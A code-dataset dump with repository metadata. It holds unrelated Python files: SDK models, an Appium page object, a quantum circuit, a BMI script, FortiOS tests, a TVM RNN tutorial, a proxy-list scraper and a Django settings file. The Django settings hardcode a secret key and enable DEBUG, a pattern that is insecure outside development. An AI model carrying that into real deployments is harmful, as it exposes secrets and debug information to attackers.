# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from ._operations import Operations
from ._quotas_operations import QuotasOperations
from ._load_tests_operations import LoadTestsOperations
from ._patch import __all__ as _patch_all
from ._patch import * # pylint: disable=unused-wildcard-import
from ._patch import patch_sdk as _patch_sdk
__all__ = [
"Operations",
"QuotasOperations",
"LoadTestsOperations",
]
__all__.extend([p for p in _patch_all if p not in __all__])
_patch_sdk()
| [
"noreply@github.com"
] | Azure.noreply@github.com |
38ff0aebf3aeaaff4c9604670e7270beb6611cde | 94ca5a956889a1263bb58fc9b8624455503783cd | /page/storagebox/personinfo.py | 686ff5550dfec556681b1a366cf3509647dcb18c | [] | no_license | xmaimiao/wmAPP | 50bfbd5c50982cae0723fa3ce3f3f8c59314403b | b427f0afaccde0d939b275f9f48724d404257f1e | refs/heads/master | 2023-03-27T05:16:31.920995 | 2021-03-29T07:31:11 | 2021-03-29T07:31:11 | 352,554,192 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,285 | py | from appium.webdriver.common.mobileby import MobileBy
from page.basepage import BasePage
from page.storagebox.editpage import EditPage
class PersonInfo(BasePage):
    # Locator for the "edit" button on the personal-information page.
    edit_ele = (MobileBy.XPATH,'//button[@class="van-button van-button--primary van-button--large van-button--plain van-button--block"]')

    def goto_editpage(self):
        """Switch to the most recently opened window, tap the edit button,
        and return the resulting EditPage page object."""
        # (Removed a block of commented-out debug prints that dumped the
        # current url, context, and window handles.)
        self.driver.switch_to_window(self.driver.window_handles[-1])
        self.find_and_click(self.edit_ele)
        return EditPage(self.driver)
"765120214@qq.com"
] | 765120214@qq.com |
fe735cb9f61a0d4d595382311f8f59fc71f50011 | 80d50ea48e10674b1b7d3f583a1c4b7d0b01200f | /src/datadog_api_client/v1/model/i_frame_widget_definition_type.py | 4b9a12abbd72dab5bebb2895c3a106438d65446c | [
"Apache-2.0",
"BSD-3-Clause",
"MIT",
"MPL-2.0"
] | permissive | DataDog/datadog-api-client-python | 3e01fa630278ad0b5c7005f08b7f61d07aa87345 | 392de360e7de659ee25e4a6753706820ca7c6a92 | refs/heads/master | 2023-09-01T20:32:37.718187 | 2023-09-01T14:42:04 | 2023-09-01T14:42:04 | 193,793,657 | 82 | 36 | Apache-2.0 | 2023-09-14T18:22:39 | 2019-06-25T22:52:04 | Python | UTF-8 | Python | false | false | 857 | py | # Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License.
# This product includes software developed at Datadog (https://www.datadoghq.com/).
# Copyright 2019-Present Datadog, Inc.
from __future__ import annotations
from datadog_api_client.model_utils import (
ModelSimple,
cached_property,
)
from typing import ClassVar
# Generated enum-like model: the only legal value is the literal "iframe".
class IFrameWidgetDefinitionType(ModelSimple):
    """
    Type of the iframe widget.

    :param value: If omitted defaults to "iframe". Must be one of ["iframe"].
    :type value: str
    """

    allowed_values = {
        "iframe",
    }

    IFRAME: ClassVar["IFrameWidgetDefinitionType"]

    @cached_property
    def openapi_types(_):
        return {
            "value": (str,),
        }


# Module-level singleton for the single allowed value.
IFrameWidgetDefinitionType.IFRAME = IFrameWidgetDefinitionType("iframe")
| [
"noreply@github.com"
] | DataDog.noreply@github.com |
d22ec5d91e8e2f8415c562b398f5064d16e44272 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02380/s032648197.py | e45329928543031c03cf6ec6f6bb061bf46b86d1 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 281 | py | import math
a, b, C = map(float, input().split())
S = (a * b * math.sin(math.radians(C))) / 2
L = a + b + (math.sqrt(a**2 + b**2 - 2*a*b*math.cos(math.radians(C))))
h = b * math.sin(math.radians(C))
print("{:.8f}".format(S))
print("{:.8f}".format(L))
print("{:.8f}".format(h))
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
9d448fa4788fc7db4f9ad0d3f889f2f0add779c3 | a9937139b1af85180cea706a52d447abce2430f4 | /a/cwiczenie_4-1/BMI.py | e4e109f6ff184f3c7a759b39f3ad213864c556ca | [] | no_license | MirekPz/Altkom | 8f16014d43adb10e87804ae2b5d23151924cb226 | 0a49e75e681593b41d07cbff63dea0723a11756b | refs/heads/master | 2020-09-29T00:12:37.990353 | 2019-12-13T15:52:30 | 2019-12-13T15:52:30 | 226,899,295 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 679 | py | wzrost = float(input("Podaj wzrost [m]; "))
waga = float(input("Podaj wagę [kg]; "))
BMI = waga/wzrost**2
print(round(BMI, 2))
if BMI < 16:
print("Wygłodzenie")
elif BMI <=16.99:
print("Wychudzenie")
elif BMI <= 18.49:
print("Niedowaga")
elif BMI <= 24.99:
print("Wartość prawidłowa:")
elif BMI <= 29.99:
print("Nadwaga")
elif BMI <= 34.99:
print("I stopień otyłości")
elif BMI <= 39.99:
print("II stopień otyłości (otyłość kliniczna)")
else:
print("III stopień otyłości (otyłość skrajna)")
print(f"Przedział prawidłowej wagi dla określonego wzrostu: [{round(18.49 * wzrost**2, 1)} , {round(24.99 * wzrost**2, 1)}]")
| [
"mirek@info-tur.pl"
] | mirek@info-tur.pl |
388d322e7321b6221b4e638c5421221acdb06151 | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /benchmark/startPyquil2978.py | 9e6b9ff316ab2c467b06cfb9f702676e859600a3 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,959 | py | # qubit number=4
# total number=46
import pyquil
from pyquil.api import local_forest_runtime, QVMConnection
from pyquil import Program, get_qc
from pyquil.gates import *
import numpy as np
conn = QVMConnection()
def make_circuit()-> Program:
    """Build and return the fixed 4-qubit pyQuil program (auto-generated
    gate sequence; the trailing `# number=` tags are generator bookkeeping)."""
    prog = Program() # circuit begin
    prog += CNOT(0,3) # number=10
    prog += H(3) # number=40
    prog += CZ(0,3) # number=41
    prog += H(3) # number=42
    prog += CNOT(0,3) # number=33
    prog += X(3) # number=34
    prog += CNOT(0,3) # number=35
    prog += CNOT(0,3) # number=25
    prog += CNOT(0,3) # number=12
    prog += H(2) # number=30
    prog += CZ(0,2) # number=31
    prog += H(2) # number=32
    prog += CNOT(0,2) # number=43
    prog += X(2) # number=44
    prog += CNOT(0,2) # number=45
    prog += H(2) # number=36
    prog += CZ(0,2) # number=37
    prog += H(2) # number=38
    prog += H(1) # number=2
    prog += H(2) # number=3
    prog += H(3) # number=4
    prog += H(0) # number=5
    prog += H(3) # number=16
    prog += CZ(1,3) # number=17
    prog += H(3) # number=18
    prog += H(1) # number=6
    prog += H(2) # number=7
    prog += H(3) # number=8
    prog += H(0) # number=9
    prog += H(2) # number=39
    prog += H(0) # number=26
    prog += CZ(3,0) # number=27
    prog += H(0) # number=28
    prog += CNOT(3,0) # number=14
    prog += Y(2) # number=29
    # circuit end
    return prog
def summrise_results(bitstrings) -> dict:
    """Tally how many times each measured bitstring occurred.

    (Function name kept as-is, typo and all — callers reference it.)
    """
    # Counter does the tallying; convert back to a plain dict so the
    # printed repr stays `{...}` exactly as before.
    return dict(Counter(bitstrings))
if __name__ == '__main__':
    # Run the circuit 1024 times on a 4-qubit QVM, join each shot's qubit
    # readouts into a bitstring, and write the tallied counts to CSV.
    prog = make_circuit()
    qvm = get_qc('4q-qvm')

    results = qvm.run_and_measure(prog,1024)
    bitstrings = np.vstack([results[i] for i in qvm.qubits()]).T
    bitstrings = [''.join(map(str, l)) for l in bitstrings]
    writefile = open("../data/startPyquil2978.csv","w")
    print(summrise_results(bitstrings),file=writefile)
    writefile.close()
| [
"wangjiyuan123@yeah.net"
] | wangjiyuan123@yeah.net |
218eff2b76cfe7f74adbaddd19c69e8b4a65b612 | bc441bb06b8948288f110af63feda4e798f30225 | /cmdb_sdk/model/container/hpa_pb2.pyi | ba9ca505ff5c447e180d7f7fc8dc3ec1ccd8f670 | [
"Apache-2.0"
] | permissive | easyopsapis/easyops-api-python | 23204f8846a332c30f5f3ff627bf220940137b6b | adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0 | refs/heads/master | 2020-06-26T23:38:27.308803 | 2020-06-16T07:25:41 | 2020-06-16T07:25:41 | 199,773,131 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,592 | pyi | # @generated by generate_proto_mypy_stubs.py. Do not edit!
import sys
from cmdb_sdk.model.container.resource_metric_source_pb2 import (
ResourceMetricSource as cmdb_sdk___model___container___resource_metric_source_pb2___ResourceMetricSource,
)
from google.protobuf.descriptor import (
Descriptor as google___protobuf___descriptor___Descriptor,
)
from google.protobuf.internal.containers import (
RepeatedCompositeFieldContainer as google___protobuf___internal___containers___RepeatedCompositeFieldContainer,
)
from google.protobuf.message import (
Message as google___protobuf___message___Message,
)
from typing import (
Iterable as typing___Iterable,
Optional as typing___Optional,
Text as typing___Text,
Union as typing___Union,
)
from typing_extensions import (
Literal as typing_extensions___Literal,
)
# Generated .pyi stub (mypy-protobuf style — see the header's "Do not edit!").
# The builtin___* aliases presumably guard against user code shadowing the
# builtins inside the stub — generator convention; confirm before relying on it.
builtin___bool = bool
builtin___bytes = bytes
builtin___float = float
builtin___int = int
if sys.version_info < (3,):
    builtin___buffer = buffer
    builtin___unicode = unicode


# Type stub for the HorizontalPodAutoscaler protobuf message and its nested
# ScaleTargetRef / Metrics messages. Bodies are `...` placeholders only.
class HorizontalPodAutoscaler(google___protobuf___message___Message):
    DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
    class ScaleTargetRef(google___protobuf___message___Message):
        DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
        kind = ... # type: typing___Text
        name = ... # type: typing___Text
        apiVersion = ... # type: typing___Text

        def __init__(self,
            *,
            kind : typing___Optional[typing___Text] = None,
            name : typing___Optional[typing___Text] = None,
            apiVersion : typing___Optional[typing___Text] = None,
            ) -> None: ...
        if sys.version_info >= (3,):
            @classmethod
            def FromString(cls, s: builtin___bytes) -> HorizontalPodAutoscaler.ScaleTargetRef: ...
        else:
            @classmethod
            def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> HorizontalPodAutoscaler.ScaleTargetRef: ...
        def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
        def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
        def ClearField(self, field_name: typing_extensions___Literal[u"apiVersion",b"apiVersion",u"kind",b"kind",u"name",b"name"]) -> None: ...

    class Metrics(google___protobuf___message___Message):
        DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
        type = ... # type: typing___Text

        @property
        def resource(self) -> cmdb_sdk___model___container___resource_metric_source_pb2___ResourceMetricSource: ...

        def __init__(self,
            *,
            type : typing___Optional[typing___Text] = None,
            resource : typing___Optional[cmdb_sdk___model___container___resource_metric_source_pb2___ResourceMetricSource] = None,
            ) -> None: ...
        if sys.version_info >= (3,):
            @classmethod
            def FromString(cls, s: builtin___bytes) -> HorizontalPodAutoscaler.Metrics: ...
        else:
            @classmethod
            def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> HorizontalPodAutoscaler.Metrics: ...
        def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
        def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
        def HasField(self, field_name: typing_extensions___Literal[u"resource",b"resource"]) -> builtin___bool: ...
        def ClearField(self, field_name: typing_extensions___Literal[u"resource",b"resource",u"type",b"type"]) -> None: ...

    instanceId = ... # type: typing___Text
    resourceName = ... # type: typing___Text
    namespace = ... # type: typing___Text
    minReplicas = ... # type: builtin___int
    maxReplicas = ... # type: builtin___int

    @property
    def scaleTargetRef(self) -> HorizontalPodAutoscaler.ScaleTargetRef: ...

    @property
    def metrics(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[HorizontalPodAutoscaler.Metrics]: ...

    def __init__(self,
        *,
        instanceId : typing___Optional[typing___Text] = None,
        resourceName : typing___Optional[typing___Text] = None,
        namespace : typing___Optional[typing___Text] = None,
        scaleTargetRef : typing___Optional[HorizontalPodAutoscaler.ScaleTargetRef] = None,
        minReplicas : typing___Optional[builtin___int] = None,
        maxReplicas : typing___Optional[builtin___int] = None,
        metrics : typing___Optional[typing___Iterable[HorizontalPodAutoscaler.Metrics]] = None,
        ) -> None: ...
    if sys.version_info >= (3,):
        @classmethod
        def FromString(cls, s: builtin___bytes) -> HorizontalPodAutoscaler: ...
    else:
        @classmethod
        def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> HorizontalPodAutoscaler: ...
    def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
    def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
    def HasField(self, field_name: typing_extensions___Literal[u"scaleTargetRef",b"scaleTargetRef"]) -> builtin___bool: ...
    def ClearField(self, field_name: typing_extensions___Literal[u"instanceId",b"instanceId",u"maxReplicas",b"maxReplicas",u"metrics",b"metrics",u"minReplicas",b"minReplicas",u"namespace",b"namespace",u"resourceName",b"resourceName",u"scaleTargetRef",b"scaleTargetRef"]) -> None: ...
| [
"service@easyops.cn"
] | service@easyops.cn |
642b38a413df309b7c1b02b03690ef51953c2841 | b25182d0034468e5e545c6c72e5a2cdd3c43a484 | /.PyCharm2017.2/system/python_stubs/-223353804/lxml/etree/DTD.py | 4a9de7fc7e62c4dfc3e361e63287deb22bbafd98 | [] | no_license | lovewula/config | f9ac16b30082c04be7733969d5359ee6c7258db6 | c0720e5bfd49f579a52f83de36de40c76996ebf6 | refs/heads/master | 2021-08-19T19:31:44.088218 | 2017-11-27T08:04:06 | 2017-11-27T08:04:06 | 111,974,690 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,892 | py | # encoding: utf-8
# module lxml.etree
# from D:\Python\Python27\lib\site-packages\lxml\etree.pyd
# by generator 1.145
""" The ``lxml.etree`` module implements the extended ElementTree API for XML. """
# imports
import __builtin__ as __builtins__ # <module '__builtin__' (built-in)>
from _Validator import _Validator
# IDE-generated skeleton of the compiled lxml.etree.DTD class; method
# bodies are placeholders and "real signature unknown" notes come from the
# stub generator.
class DTD(_Validator):
    """
    DTD(self, file=None, external_id=None)
    A DTD validator.

    Can load from filesystem directly given a filename or file-like object.
    Alternatively, pass the keyword parameter ``external_id`` to load from a
    catalog.
    """
    def elements(self, *args, **kwargs): # real signature unknown
        pass

    def entities(self, *args, **kwargs): # real signature unknown
        pass

    def iterelements(self, *args, **kwargs): # real signature unknown
        pass

    def iterentities(self, *args, **kwargs): # real signature unknown
        pass

    def __call__(self, etree): # real signature unknown; restored from __doc__
        """
        __call__(self, etree)

        Validate doc using the DTD.

        Returns true if the document is valid, false if not.
        """
        pass

    def __init__(self, file=None, external_id=None): # real signature unknown; restored from __doc__
        pass

    @staticmethod # known case of __new__
    def __new__(S, *more): # real signature unknown; restored from __doc__
        """ T.__new__(S, ...) -> a new object with type S, a subtype of T """
        pass

    external_id = property(lambda self: object(), lambda self, v: None, lambda self: None)  # default

    name = property(lambda self: object(), lambda self, v: None, lambda self: None)  # default

    system_url = property(lambda self: object(), lambda self, v: None, lambda self: None)  # default

    __pyx_vtable__ = None # (!) real value is ''
| [
"lovewula1314@gmail.com"
] | lovewula1314@gmail.com |
568c23ea6c150f1790bd62cfcdcca3c4eb2884d9 | cca5ceb42b09e567d79fcb46f298757c1ff04447 | /Requests/ProxyIP.py | 16b5e0c5908fa2e51b4e45542a118d54b3bdf395 | [] | no_license | NishantGhanate/PythonScripts | 92933237720e624a0f672729743a98557bea79d6 | 60b92984d21394002c0d3920bc448c698e0402ca | refs/heads/master | 2022-12-13T11:56:14.442286 | 2022-11-18T14:26:33 | 2022-11-18T14:26:33 | 132,910,530 | 25 | 15 | null | 2022-12-09T09:03:58 | 2018-05-10T14:18:33 | Python | UTF-8 | Python | false | false | 536 | py | import requests
from lxml.html import fromstring
def get_proxies():
    """Scrape up to 20 HTTPS-capable proxies from free-proxy-list.net.

    Returns a set of "ip:port" strings. Network access and the site's
    current table layout are both required for this to work.
    """
    url = 'https://free-proxy-list.net/'
    response = requests.get(url)
    parser = fromstring(response.text)
    proxies = set()
    for i in parser.xpath('//tbody/tr')[:20]:
        # Column 7 is the HTTPS flag; keep only rows marked "yes".
        if i.xpath('.//td[7][contains(text(),"yes")]'):
            #Grabbing IP and corresponding PORT
            proxy = ":".join([i.xpath('.//td[1]/text()')[0], i.xpath('.//td[2]/text()')[0]])
            proxies.add(proxy)
    return proxies

proxies = get_proxies()
print(proxies)
"nishant7.ng@gmail.com"
] | nishant7.ng@gmail.com |
d3c160de4501cb84be1bc3e5585762ce8b657d36 | 27e890f900bd4bfb2e66f4eab85bc381cf4d5d3f | /tests/unit/modules/network/fortios/test_fortios_switch_controller_quarantine.py | 4093a700e7f1a2da8709a47b049c6a23e71f795d | [] | no_license | coll-test/notstdlib.moveitallout | eb33a560070bbded5032385d0aea2f3cf60e690b | 0987f099b783c6cf977db9233e1c3d9efcbcb3c7 | refs/heads/master | 2020-12-19T22:28:33.369557 | 2020-01-23T18:51:26 | 2020-01-23T18:51:26 | 235,865,139 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,077 | py | # Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
from mock import ANY
from ansible_collections.notstdlib.moveitallout.plugins.module_utils.network.fortios.fortios import FortiOSHandler
try:
from ansible_collections.notstdlib.moveitallout.plugins.modules import fortios_switch_controller_quarantine
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
@pytest.fixture(autouse=True)
def connection_mock(mocker):
    # Patch the module's Connection class for every test in this file.
    connection_class_mock = mocker.patch('ansible_collections.notstdlib.moveitallout.plugins.modules.fortios_switch_controller_quarantine.Connection')
    return connection_class_mock

# Shared handler under test, built on the (mocked) connection.
fos_instance = FortiOSHandler(connection_mock)
def test_switch_controller_quarantine_creation(mocker):
    # Successful POST: module should report changed=True and no error.
    schema_method_mock = mocker.patch('ansible_collections.notstdlib.moveitallout.plugins.module_utils.network.fortios.fortios.FortiOSHandler.schema')
    set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
    set_method_mock = mocker.patch('ansible_collections.notstdlib.moveitallout.plugins.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
    input_data = {
        'username': 'admin',
        'state': 'present',
        'switch_controller_quarantine': {
            'quarantine': 'enable',
        },
        'vdom': 'root'}
    is_error, changed, response = fortios_switch_controller_quarantine.fortios_switch_controller(input_data, fos_instance)
    expected_data = {
        'quarantine': 'enable',
    }
    set_method_mock.assert_called_with('switch-controller', 'quarantine', data=expected_data, vdom='root')
    schema_method_mock.assert_not_called()
    assert not is_error
    assert changed
    assert response['status'] == 'success'
    assert response['http_status'] == 200
def test_switch_controller_quarantine_creation_fails(mocker):
    """An HTTP 500 from the API must surface as an error and no change."""
    schema_mock = mocker.patch('ansible_collections.notstdlib.moveitallout.plugins.module_utils.network.fortios.fortios.FortiOSHandler.schema')
    set_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
    set_mock = mocker.patch('ansible_collections.notstdlib.moveitallout.plugins.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_result)
    module_args = {
        'username': 'admin',
        'state': 'present',
        'switch_controller_quarantine': {'quarantine': 'enable'},
        'vdom': 'root'}
    is_error, changed, response = fortios_switch_controller_quarantine.fortios_switch_controller(module_args, fos_instance)
    set_mock.assert_called_with('switch-controller', 'quarantine', data={'quarantine': 'enable'}, vdom='root')
    schema_mock.assert_not_called()
    assert is_error
    assert not changed
    assert response['status'] == 'error'
    assert response['http_status'] == 500
def test_switch_controller_quarantine_idempotent(mocker):
    """A DELETE answered with 404 means the state already matched: no error, no change."""
    schema_mock = mocker.patch('ansible_collections.notstdlib.moveitallout.plugins.module_utils.network.fortios.fortios.FortiOSHandler.schema')
    set_result = {'status': 'error', 'http_method': 'DELETE', 'http_status': 404}
    set_mock = mocker.patch('ansible_collections.notstdlib.moveitallout.plugins.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_result)
    module_args = {
        'username': 'admin',
        'state': 'present',
        'switch_controller_quarantine': {'quarantine': 'enable'},
        'vdom': 'root'}
    is_error, changed, response = fortios_switch_controller_quarantine.fortios_switch_controller(module_args, fos_instance)
    set_mock.assert_called_with('switch-controller', 'quarantine', data={'quarantine': 'enable'}, vdom='root')
    schema_mock.assert_not_called()
    assert not is_error
    assert not changed
    assert response['status'] == 'error'
    assert response['http_status'] == 404
def test_switch_controller_quarantine_filter_foreign_attributes(mocker):
    """Attributes not in the module schema must be stripped before the API call."""
    schema_mock = mocker.patch('ansible_collections.notstdlib.moveitallout.plugins.module_utils.network.fortios.fortios.FortiOSHandler.schema')
    set_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
    set_mock = mocker.patch('ansible_collections.notstdlib.moveitallout.plugins.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_result)
    module_args = {
        'username': 'admin',
        'state': 'present',
        'switch_controller_quarantine': {
            'random_attribute_not_valid': 'tag',
            'quarantine': 'enable',
        },
        'vdom': 'root'}
    is_error, changed, response = fortios_switch_controller_quarantine.fortios_switch_controller(module_args, fos_instance)
    # 'random_attribute_not_valid' must NOT appear in the forwarded payload.
    set_mock.assert_called_with('switch-controller', 'quarantine', data={'quarantine': 'enable'}, vdom='root')
    schema_mock.assert_not_called()
    assert not is_error
    assert changed
    assert response['status'] == 'success'
    assert response['http_status'] == 200
| [
"wk@sydorenko.org.ua"
] | wk@sydorenko.org.ua |
eec408b4327d41fd937c2ad9c5fbdfce8c90427b | 777844bd87b2e87bb992af18bdf13ca1b2c747fd | /nnvm/tutorials/nlp/from_darknet_rnn.py | bbf70c724bbe43a4aeba64d71b5443cd3a88be94 | [
"Apache-2.0"
] | permissive | FrozenGene/tvm | 5a6d875e39af0f2c00e1508bf33a3f699ae9ac27 | fbd1c16484b5710a48717b9cf50f424326a84cca | refs/heads/master | 2021-06-18T09:14:49.173534 | 2019-04-02T00:10:16 | 2019-04-02T00:10:16 | 155,194,851 | 1 | 2 | Apache-2.0 | 2018-10-29T10:43:18 | 2018-10-29T10:43:18 | null | UTF-8 | Python | false | false | 5,383 | py | """
Compile Darknet Models for RNN
==============================
**Author**: `Siju Samuel <https://siju-samuel.github.io/>`_
This article is an introductory tutorial to deploy darknet rnn models with NNVM.
This script will run a character prediction model
Each module consists of 3 fully-connected layers. The input layer propagates information from the
input to the current state. The recurrent layer propagates information through time from the
previous state to the current one.
The input to the network is a 1-hot encoding of ASCII characters. We train the network to predict
the next character in a stream of characters. The output is constrained to be a probability
distribution using a softmax layer.
Since each recurrent layer contains information about the current character and the past
characters, it can use this context to predict the future characters in a word or phrase.
All the required models and libraries will be downloaded from the internet
by the script.
"""
import random
import numpy as np
import tvm
from tvm.contrib import graph_runtime
from tvm.contrib.download import download_testdata
from nnvm.testing.darknet import __darknetffi__
import nnvm
import nnvm.frontend.darknet
# Set the parameters
# -----------------------
# Set the seed value and the number of characters to predict
# Model name
MODEL_NAME = 'rnn'
# Seed text: its characters are fed verbatim before free-running prediction.
seed = 'Thus'
# Number of characters to predict
num = 1000
# Download required files
# -----------------------
# Download cfg and weights file if first time.
CFG_NAME = MODEL_NAME + '.cfg'
WEIGHTS_NAME = MODEL_NAME + '.weights'
REPO_URL = 'https://github.com/dmlc/web-data/blob/master/darknet/'
CFG_URL = REPO_URL + 'cfg/' + CFG_NAME + '?raw=true'
WEIGHTS_URL = REPO_URL + 'weights/' + WEIGHTS_NAME + '?raw=true'
cfg_path = download_testdata(CFG_URL, CFG_NAME, module='darknet')
weights_path = download_testdata(WEIGHTS_URL, WEIGHTS_NAME, module='darknet')
# Download and Load darknet library
DARKNET_LIB = 'libdarknet.so'
DARKNET_URL = REPO_URL + 'lib/' + DARKNET_LIB + '?raw=true'
lib_path = download_testdata(DARKNET_URL, DARKNET_LIB, module='darknet')
# NOTE(review): DARKNET_LIB is rebound here — first the shared-object file
# name, then the opened CFFI handle.
DARKNET_LIB = __darknetffi__.dlopen(lib_path)
net = DARKNET_LIB.load_network(cfg_path.encode('utf-8'), weights_path.encode('utf-8'), 0)
dtype = 'float32'
batch_size = 1
# Import the graph to NNVM
# ------------------------
# Import darknet graph definition to nnvm.
#
# Results:
# sym: nnvm graph for rnn model
# params: params converted from darknet weights
print("Converting darknet rnn model to nnvm symbols...")
sym, params = nnvm.frontend.darknet.from_darknet(net, dtype)
# Compile the model on NNVM.
# np.empty leaves the buffer uninitialized; only its shape/dtype are used below.
data = np.empty([1, net.inputs], dtype)#net.inputs
target = 'llvm'
shape = {'data': data.shape}
print("Compiling the model...")
shape_dict = {'data': data.shape}
dtype_dict = {'data': data.dtype}
with nnvm.compiler.build_config(opt_level=2):
    graph, lib, params = nnvm.compiler.build(sym, target, shape_dict, dtype_dict, params)
# Execute the portable graph on TVM
# ---------------------------------
# Now we can try deploying the NNVM compiled model on cpu target.
# Set the cpu context
ctx = tvm.cpu(0)
# Create graph runtime
m = graph_runtime.create(graph, lib, ctx)
# Set the params to runtime
m.set_input(**params)
def _init_state_memory(rnn_cells_count, dtype):
    """Allocate a zeroed 1024-wide TVM state buffer for every recurrent cell.

    Returns a dict mapping 'rnn<i>_state' -> tvm.nd.array of zeros.
    """
    state_shape = (1024,)
    return {
        'rnn%d_state' % cell: tvm.nd.array(np.zeros(state_shape, dtype).astype(dtype))
        for cell in range(rnn_cells_count)
    }
def _set_state_input(runtime, states):
'''Set the state inputs'''
for state in states:
runtime.set_input(state, states[state])
def _get_state_output(runtime, states):
    """Read back each cell's state from the runtime and store it in `states`.

    Output slot 0 holds the character distribution, so state tensors
    occupy slots 1..len(states) in insertion order.
    """
    for slot, key in enumerate(states, start=1):
        previous = states[key]
        states[key] = runtime.get_output(slot, tvm.nd.empty(previous.shape, previous.dtype))
def _proc_rnn_output(out_data):
'''Generate the characters from the output array'''
sum_array = 0
n = out_data.size
r = random.uniform(0, 1)
for j in range(n):
if out_data[j] < 0.0001:
out_data[j] = 0
sum_array += out_data[j]
for j in range(n):
out_data[j] *= float(1.0) / sum_array
r = r - out_data[j]
if r <= 0:
return j
return n-1
print("RNN generaring text...")
out_shape = (net.outputs,)
rnn_cells_count = 3
# Initialize state memory
# -----------------------
states = _init_state_memory(rnn_cells_count, dtype)
len_seed = len(seed)
count = len_seed + num
out_txt = ""
# Initialize random seed (makes the sampled text reproducible)
random.seed(0)
c = ord(seed[0])
# One-hot input buffer over the ASCII vocabulary.
inp_data = np.zeros([net.inputs], dtype)
# Run the model
# -------------
# Predict character by character till `num`
for i in range(count):
    # Set the one-hot bit for the current character, then clear it after use.
    inp_data[c] = 1
    # Set the input data
    m.set_input('data', tvm.nd.array(inp_data.astype(dtype)))
    inp_data[c] = 0
    # Set the state inputs
    _set_state_input(m, states)
    # Run the model
    m.run()
    # Get the output
    tvm_out = m.get_output(0, tvm.nd.empty(out_shape, dtype)).asnumpy()
    # Get the state outputs
    _get_state_output(m, states)
    # Teacher-force the seed characters, then sample freely from the model.
    c = ord(seed[i]) if i < len_seed else _proc_rnn_output(tvm_out)
    out_txt += chr(c)
print("Predicted Text =", out_txt)
| [
"tqchen@users.noreply.github.com"
] | tqchen@users.noreply.github.com |
9e786306217ad5c74dde5a37eab383d4a736229b | d7a1b26449211f4ea67dce9370f6558f16df992c | /todo/settings.py | 1e4b4da5176e67e3e8e7a02f0936daf740f04dde | [] | no_license | SonerArslan2019/ToDoAPP_Django_BULMA | 8c245b49e2f8f6e35d34b9cf34bdc923fc065ce5 | 8a0c8d97699b856c7634b2a98692b9311a0bf183 | refs/heads/master | 2023-04-15T08:33:19.635367 | 2021-04-25T19:11:18 | 2021-04-25T19:11:18 | 361,483,184 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,296 | py | """
Django settings for todo project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): the key is committed to source control and DEBUG is on —
# acceptable for local development only; load SECRET_KEY from the
# environment before deploying.
SECRET_KEY = 'django-insecure-m_+a)4*n05ypamd=ul=$^eiubs7p62elic_g#z%ppfhfpc^*s('
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
